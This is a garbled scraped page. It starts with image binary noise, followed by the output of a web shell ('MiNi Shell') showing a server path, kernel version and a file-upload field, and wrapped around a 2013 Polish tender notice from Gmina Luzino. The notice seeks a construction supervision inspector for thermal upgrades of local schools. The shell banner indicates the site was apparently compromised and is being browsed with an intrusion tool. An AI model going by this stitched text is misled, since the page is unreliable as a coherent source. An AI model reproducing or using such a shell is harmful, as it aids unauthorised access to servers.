JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130723/290344-N-2013.html

<p class="kh_header"><b>Luzino: SPRAWOWANIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD REALIZACJĄ ZADANIA: TERMOMODERNIZACJA BUDYNKÓW UŻYTECZNOŚCI PUBLICZNEJ NA TERENIE GMINY LUZINO</b><br>
<b>Numer ogłoszenia: 290344 - 2013; data zamieszczenia: 23.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Luzino , ul. Ofiar Stutthofu 11, 84-242 Luzino, woj. pomorskie, tel. 058 6782068 w. 49, faks 058 6782325.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.luzino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPRAWOWANIE FUNKCJI INSPEKTORA NADZORU INWESTORSKIEGO NAD REALIZACJĄ ZADANIA: TERMOMODERNIZACJA BUDYNKÓW UŻYTECZNOŚCI PUBLICZNEJ NA TERENIE GMINY LUZINO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprawowanie funkcji inspektora nadzoru inwestorskiego nad realizacją zadania: termomodernizacja budynków użyteczności publicznej, na terenie Gminy Luzino. Przedsięwzięcie dotyczy obiektów oświatowych takich jak:
1)	Budynki Szkoły Podstawowej im. Lecha Bądkowskiego w Luzinie przy:
a)	ulicy Szkolnej 13
b)	ulicy Ofiar Stutthofu 13 i 13A
2)	Budynek Szkoły Podstawowej im. Jana Pawła II w Kębłowie przy ul. Wiejskiej 49.
Zakres przedmiotu zamówienia obejmuje pełnienie nadzoru inwestorskiego nad realizacją w/w zadania, w szczególności poprzez nadzorowanie wykonania robót w zakresie: 
-Termomodernizacji budynku Szkoły Podstawowej im. Lecha Bądkowskiego w Luzinie przy ulicy Szkolnej 13 - przedmiot zamówienia obejmuje w szczególności:
1)	Wymianę instalacji c.o.
2)	Ocieplenie ścian zewnętrznych
3)	Docieplenie stropodachu budynku
4)	Wymianę luksferów i okna na witryny okienne wraz z wymianą drzwi zewnętrznych
5)	Inne prace ogólno-budowlane, tymczasowe i towarzyszące oraz roboty niezbędne do prawidłowego wykonania przedmiotu umowy. 
-Termomodernizacji budynków Szkoły Podstawowej im. Lecha Bądkowskiego w Luzinie przy ulicy Ofiar Stutthofu 13 i 13A - przedmiot zamówienia obejmuje w szczególności:
Budynek przy ulicy Ofiar Stutthofu 13:
1)	Wymianę instalacji gazowej i c.o.
2)	Ocieplenie dachu
3)	Wymianę stolarki okiennej i drzwi zewnętrznych
4)	Inne prace ogólno-budowlane, tymczasowe i towarzyszące oraz roboty niezbędne do prawidłowego wykonania przedmiotu umowy. 
Budynek przy ulicy Ofiar Stutthofu 13A:
1)	Wymianę instalacji gazowej i c.o.
2)	Ocieplenie ścian zewnętrznych
3)	Ocieplenie dachu i stropodachu 
4)	Wymianę stolarki okiennej i drzwi zewnętrznych
5)	Inne prace ogólno-budowlane, tymczasowe i towarzyszące oraz roboty niezbędne do prawidłowego wykonania przedmiotu umowy. 
-Termomodernizacji budynku Szkoły Podstawowej im. Jana Pawła II w Kębłowie  przy ulicy Wiejskiej 49 - przedmiot zamówienia obejmuje w szczególności:  
1)	Wymianę instalacji c.o.
2)	Wymianę źródła ciepła (kotłownia, instalacja solarna)
3)	Ocieplenie ścian zewnętrznych
4)	Docieplenie stropodachu 
5)	Wymianę stolarki okiennej i drzwi 
6)	Inne prace ogólno-budowlane, tymczasowe i towarzyszące oraz roboty niezbędne do prawidłowego wykonania przedmiotu umowy. 
Przedmiot zamówienia (w zadaniu powyżej - SP Kębłowo), obejmuje również, między innymi, roboty budowlane polegające na instalacji układu solarnego, który winien składać się z dwóch kompletów, po sześć paneli każdy, na bazie płaskich kolektorów słonecznych o układzie meandrycznym, harfowym lub podwójnej harfy, przewodów czynnika grzewczego we wnętrzu kolektora wspomagających przygotowanie ciepłej wody użytkowej (c.w.u.).
Wykonanie technologicznego układu instalacji solarnej wspomagającej podgrzewanie wody dla potrzeb ciepłej wody użytkowej (c.w.u.) w przedmiotowej szkole podstawowej składa się z:
1)	Paneli solarnych kolektorów słonecznych płaskich,
2)	Wymiennika cieplnego (zasobnika), z możliwością podłączenia grzałki elektrycznej,
3)	Grupy solarnej (układu pompowego),
4)	Sterownika solarnego,
5)	Naczyń wzbiorczych,
6)	Oprzyrządowania instalacji (armatura zabezpieczająca i regulująca pracą układu solarnego),
7)	Przewodów rurowych,
8)	Wpięcia do instalacji elektrycznej układu technologicznego systemu,
9)	Wpięcia wykonanego układu grzewczego w istniejącą instalację c.w.u.,
10)	Wykonanie przyłączenia wymiennika ciepła do istniejącego źródła ciepła.
11)	Montażu instalacji zalanej glikolem propylenowym o punkcie krzepnięcia nie wyższym niż  - 35 stopni C.

W ramach zadania należy wykonać prace tymczasowe i towarzyszące m.in.:
1)	Montaż i demontaż rusztowań,
2)	Wyznaczenie trasy przebiegu przewodów grzewczych na obiekcie od miejsca posadowienia kolektorów solarnych (dach, ściana) do wpięcia w istniejącą instalację c.w.u. użytkownika,
3)	Zamocowanie konstrukcji wspornikowych - ze stali nierdzewnej i aluminiowych stelaży kolektorów w taki sposób aby uzyskać kąt najbardziej zbliżony do 45 stopni,
4)	Zabezpieczenie antykorozyjne elementów konstrukcji wspierających narażonych na korozję,
5)	Naprawę pokrycia dachowego i innych elementów dachu w miejscu objętym pracami montażowymi, w przypadku uszkodzenia podczas prac montażowych.
6)	Wykonanie przejść w przegrodach wewnętrznych i zewnętrznych.
7)	Zabezpieczenie miejsc przebić i przejść rur, przewodów elektrycznych, oraz doprowadzenie do stanu pierwotnego tych miejsc, szczególnie przejść przez pokrywy dachowe.
8)	Przygotowanie podłoża (miejsca pod posadowienie zasobnika),
9)	Prace monterskie związane z układaniem przewodów, montażem osprzętu, urządzeń technologicznych, armatury regulującej, odcinającej, sterującej z uwzględnieniem instalacji elektrycznej niezbędnej do obsługi pracy instalacji solarnej,
10)	Próby szczelności, rozruch instalacji i regulacja, prace wykończeniowe po przeprowadzonych robotach,
11)	Pozostałe prace niezbędne do uznania przedmiotu zamówienia za wykonane zgodnie ze sztuką budowlaną i prawidłowo ukończone.

Należy zastosować kolektory słoneczne posiadające:
1)	Aktualny europejski certyfikat na znak SOLAR KEYMARK nadany przez jednostkę certyfikującą potwierdzający zgodność oferowanego kolektora słonecznego z normami i parametrami podanymi w  dokumentacji technicznej i specyfikacjach technicznych wykonania i odbioru robót budowlanych wraz ze sprawozdaniem z badań wydanych przez niezależną jednostkę badawczą
lub 
2)	Aktualne zaświadczenie/certyfikat zgodności wydany przez akredytowaną jednostkę certyfikującą potwierdzającą zgodność oferowanego kolektora słonecznego z normami i parametrami podanymi w dokumentacji technicznej i specyfikacjach technicznych wykonania i odbioru robót budowlanych wraz ze sprawozdaniem z badań wydane przez niezależną jednostkę badawczą.
Uwaga: Prace budowlane będą prowadzone na czynnych obiektach szkolnych!
Szczegółowy zakres prac określony został w Dokumentacji Technicznej, stanowiącej Załącznik nr 9 do niniejszej SIWZ, która zawiera: dokumentację projektową, specyfikację techniczną wykonania i odbioru robót oraz przedmiary robót. 
Zakres przedmiotu zamówienia (obowiązki Wykonawcy - inspektora nadzoru inwestorskiego) obejmuje w szczególności również:
1)	Przekazanie wykonawcy robót budowlanych, w imieniu Zamawiającego, terenu budowy,
2)	Reprezentowanie Zamawiającego (Inwestora) na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę (jeżeli dotyczy), przepisami oraz zasadami wiedzy technicznej,
3)	Sprawdzanie jakości wykonywanych robot i wbudowanych wyrobów budowlanych, a w szczególności zapobiegnie wbudowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie,
4)	Nadzór nad terminowością realizacji robót budowlanych, w szczególności w zakresie dotrzymania terminu ich zakończenia,
5)	Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,
6)	Potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy wraz z podpisaniem końcowego protokołu odbioru robót,
7)	Kontrolowanie zgodności realizacji robót budowlanych z uzgodnionym przez Strony harmonogramem robót,
8)	Pisemne zatwierdzenie zestawienia zrealizowanych robót zgodnie z Harmonogramem rzeczowo-finansowym,
9)	Kontrolowanie prawidłowości prowadzenia Dziennika Budowy (jeżeli dotyczy) i dokonywanie w nim wpisów, stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót,
10)	Sporządzanie protokołów konieczności w przypadku wystąpienia robót dodatkowych oraz przedstawianie ich do zatwierdzenia Zamawiającemu, po uprzednim sprawdzeniu ich wyceny. Bez zgody Zamawiającego inspektor nadzoru nie jest upoważniony do wydawania wykonawcy robót budowlanych poleceń wykonania robót uzupełniających czy dodatkowych,
11)	Kompletowanie i kontrola wszelkich dokumentów wymaganych od wykonawcy robót niezbędnych do odbioru,
12)	Pełna dyspozycyjność wobec wykonawcy robót i Zamawiającego - niezwłoczne stawianie się na uzasadnione wezwanie telefoniczne lub inne Wykonawcy robót, potwierdzone wpisem do Dziennika Budowy(jeżeli dotyczy),
13)	Sprawdzanie dokumentacji powykonawczej oraz wszystkich dokumentów dostarczonych przez wykonawcę robót pod względem ich kompletności, treści merytorycznej i finansowej,
14)	Organizowanie narad koordynacyjnych (Rada Budowy), sporządzanie protokołów z narad i przekazywanie ich zainteresowanym stronom (wykonawcy robót i Zamawiającemu) w terminie do 5 dni po naradzie, 
15)	Pisemne zgłaszanie Zamawiającemu informacji dotyczących ewentualnych zakłóceń związanych z realizacją prac, w tym również informacji o wszelkich opóźnieniach w realizacji harmonogramu  z określeniem ich przyczyn,
16)	Zapewnienie sprawowania nadzoru inwestorskiego w sposób nieprzerwany i niezakłócony, a w przypadku niemożliwości podjęcia czynności określonych w niniejszej umowie zapewnienie uprawnionego zastępstwa, 
17)	Udział w prowadzeniu ewentualnych negocjacji w konfliktach z mieszkańcami, związanymi  z realizacją przedmiotu zamówienia,
18)	Wnioskowanie do Inwestora w sprawach dotyczących wprowadzenia niezbędnych zmian w dokumentacji technicznej i uzyskania zgody projektanta na zmiany, przeprowadzania niezbędnych ekspertyz i badań technicznych oraz w innych ważnych sprawach finansowych i prawnych,
19)	Uzyskiwanie od projektanta wyjaśnień wątpliwości dotyczących projektu i zawartych w nim rozwiązań,
20)	Udzielanie wykonawcy robót informacji, wyjaśnień i wskazówek dotyczących realizacji zamówienia,
21)	Kontrolowanie stosowania przez wykonawcę robót przepisów dotyczących ochrony środowiska naturalnego,
22)	Kontrolowanie przestrzegania przez wykonawcę robót zasad bhp,
23)	Wstrzymanie robót w przypadku prowadzenia ich niezgodnie z zamówieniem i przepisami bhp,
24)	Bieżące informowanie Zamawiającego o wszelkich problemach związanych z realizacją inwestycji, 
25)	Potwierdzanie wpisem do Dziennika Budowy (jeżeli dotyczy) każdorazowej obecności na budowie,
26)	Wykonywanie innych zadań wynikających z przepisów prawa.
Do obowiązków inspektora nadzoru inwestorskiego, w czasie trwania okresu gwarancyjnego udzielonego przez wykonawcę robót na zrealizowaną inwestycję, będzie należało również:
1)	Dokonywanie systematycznych przeglądów zrealizowanych robót,
2)	Zbieranie zgłoszeń dotyczących wad zaistniałych w okresie gwarancyjnym,
3)	Zgłaszanie wykonawcy robót zaistniałych wad i ustalanie z nim terminów ich usuwania,
4)	Nadzorowanie realizacji robót związanych z usuwaniem wad zaistniałych w okresie gwarancyjnym i poświadczanie ich wykonania,
5)	Ocena wykonanych robót w okresie gwarancyjnym,
6)	Sprawdzenie kompletności i prawidłowości dokumentów przedstawionych przez wykonawcę robót budowlanych do odbioru ostatecznego i przedstawienia wniosku inwestorowi w celu ustalenia terminu odbioru pogwarancyjnego, 
7)	Potwierdzenie ostatecznego rozliczenia po okresie gwarancyjnym, wraz z podpisaniem ostatecznego protokołu odbioru robót,
8)	Wykonywanie innych zadań wynikających z przepisów prawa..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie szczegółowych warunków udziału  w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie szczegółowych warunków udziału  w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił w tym zakresie szczegółowych warunków udziału  w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie osobami, z których:
a)	minimum 1 (jedna) osoba posiada uprawnienia  budowlane w zakresie kierowania robotami budowlanymi w specjalności  konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
b)	minimum 1 (jedna) osoba posiada uprawnienia  budowlane w zakresie kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c)	minimum 1 (jedna) osoba posiadająca uprawnienia budowlane w zakresie kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
UWAGA!
Zamawiający dopuszcza możliwości łączenia przez jedną osobę ww. funkcji (odpowiednio lit. a, b, c), jeżeli posiada stosowne uprawnienia, celem spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia.
Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r.  Prawo budowlane (tekst jednolity Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz ustawy  z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394.).
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia, zgodnie   z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna posiadanie opłaconej polisy, potwierdzającej, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę min. 200.000,00 zł.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia, zgodnie   z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo (oryginał lub uwierzytelniona notarialnie kopia) osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.Pisemne zobowiązanie innych podmiotów do udostępnienia Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie: przesunięcia terminu wykonania przedmiotu zamówienia, pod warunkiem zmiany terminu realizacji inwestycji, tym samym terminu rozliczenia projektu, ewentualnej zmiany składu osobowego lub dodanie nowych osób, które może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osoby o kwalifikacjach nie niższych niż przedstawione w ofercie, zmiany lub wprowadzenia nowych podwykonawców, pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w niniejszej SIWZ oraz zmiany wynagrodzenia, w przypadku zmiany wysokości podatku VAT, w stopniu i terminie odpowiadającym tym zmianom.
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.luzino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Luzino, ul. 10 Marca 11 84-242 Luzino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2013 godzina 10:00, miejsce: Urząd Gminy Luzino, Kancelaria ul. Ofiar Stutthofu 11 84-242 Luzino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com